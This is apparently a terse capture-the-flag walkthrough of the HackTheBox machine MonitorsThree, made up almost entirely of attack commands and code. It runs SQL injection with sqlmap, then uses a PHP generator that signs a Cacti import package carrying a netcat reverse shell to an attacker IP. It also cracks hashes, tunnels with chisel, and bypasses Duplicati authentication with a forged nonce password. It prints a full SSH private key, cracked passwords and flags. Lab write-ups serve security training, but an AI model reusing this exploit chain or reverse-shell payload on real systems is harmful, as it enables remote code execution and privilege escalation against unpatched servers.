[Meachines] [Medium] MonitorsThree SQLI+Cacti-CMS-RCE+Duplicati权限提升
信息收集
IP Address | Opening Ports |
---|---|
10.10.11.30 | TCP:22,80 |
$ nmap -p- 10.10.11.30 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne
Cacti
# echo '10.10.11.30 monitorsthree.htb' >>/etc/hosts
http://monitorsthree.htb/
$ ffuf -w ~/Subdomain.txt -u http://monitorsthree.htb -H 'HOST: FUZZ.10.10.11.30' -fs 13560
# echo '10.10.11.30 cacti.monitorsthree.htb' >>/etc/hosts
http://cacti.monitorsthree.htb/cacti/
$ sqlmap -u 'http://monitorsthree.htb/forgot_password.php' --level=5 --risk=3 --batch
admin:greencacti2001
<?php
$xmldata = "<xml>
<files>
<file>
<name>resource/test.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
$filedata = "<?php shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.43 10032 >/tmp/f'); ?>";
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");
?>
$ php rev.php
Import/Export -> Import Packages
www-data@monitorsthree:~/html$ cat /var/www/html/cacti/include/config.php
user:cactiuser password:cactiuser
MariaDB [cacti]> select * from user_auth\G;
$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK
$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
user:marcus password:12345678910
www-data@monitorsthree:~/html/cacti/resource$ su marcus
User.txt
f9fb42ef0c734ab3310e509e6b1117c5
Privilege Escalation && Duplicati
$ ./chisel client 10.10.16.43:8000 R:8200:localhost:8200
$ chisel server -p 8000 --reverse
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
$ scp -i /tmp/id_rsa marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
$ sqlite3 Duplicati-server.sqlite
$ echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256
get-nonce=1
2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=
var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a';
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('2dlBrErvpm9f5CXhY945hSOXSKoL0dlRcP8/4L0sRXM=') + saltedpwd)).toString(CryptoJS.enc.Base64);
console.log(noncedpwd);
password=h4LMqdVeLuzUINQU48IOw%2bCMiGqxaMi6rs/p1CDsm0Y%3d
http://127.0.0.1:8200/ngax/index.html#/add
/source/tmp/
/source/root/root.txt
添加路径
http://127.0.0.1:8200/ngax/index.html#/restorestart
http://127.0.0.1:8200/ngax/index.html#/restore/18
$ marcus@monitorsthree:~/root.txt$ cat root.txt
Root.txt
0bc465bacfe9ffc0f42898508faafa69